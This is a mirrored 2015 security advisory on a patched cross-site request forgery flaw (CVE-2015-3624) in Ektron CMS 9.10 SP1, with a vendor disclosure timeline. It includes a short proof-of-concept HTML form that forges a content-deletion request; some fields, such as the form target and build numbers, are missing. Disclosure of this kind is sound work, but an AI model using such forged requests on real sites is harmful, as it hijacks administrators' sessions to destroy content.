Информационная безопасность
[RU] switch to English

Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  Xloner v3.1.2 wordpress plugin authenticated command execution and XSS

  CVE-2015-4010 - Cross-site Request Forgery & Cross-site Scripting in Encrypted Contact Form Wordpress Plugin v1.0.4

  AnimaGallery 2.6 (theme and lang cookie parameter) Local File Include Vulnerability

  Symphony CMS 2.6.2

From:jerold_(at)_v00d00sec.com <jerold_(at)_v00d00sec.com>
Date:8 июня 2015 г.
Subject:Ektron CMS 9.10 SP1 - CSRF Vulnerability

# Vulnerability type: Cross-site Request Forgery
# Vendor: http://www.ektron.com/
# Product: Ektron Content Management System
# Affected version: =< 9.10 SP1 (Build
# Patched version: 9.10 SP1 (Build
# CVE ID: CVE-2015-3624
# Credit: Jerold Hoong


Cross-site request forgery (CSRF) vulnerability in MenuActions.aspx in Ektron CMS 9.10
SP1 before build allows remote attackers to hijack the authentication
of content administrators for requests that could lead to the deletion of content and

   <form action=""
     <input type="hidden" name="action" value="delete" />
     <input type="hidden" name="contentId" value="4210" />
     <input type="hidden" name="LangType" value="1033" />
     <input type="hidden" name="folderId" value="561" />
     <input type="hidden" name="redirectBack" value="true" />
     <input type="hidden" name="menuType" value="Workarea" />
     <input type="submit" value="Submit request" />

– 07/04/2015: Vulnerability found
– 07/04/2015: Vendor informed
– 08/04/2015: Vendor responded and acknowledged
- 01/05/2015: MITRE issued CVE number
– 28/05/2015: Vendor released cumulative update for the issue
– 31/05/2015: Public disclosure

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород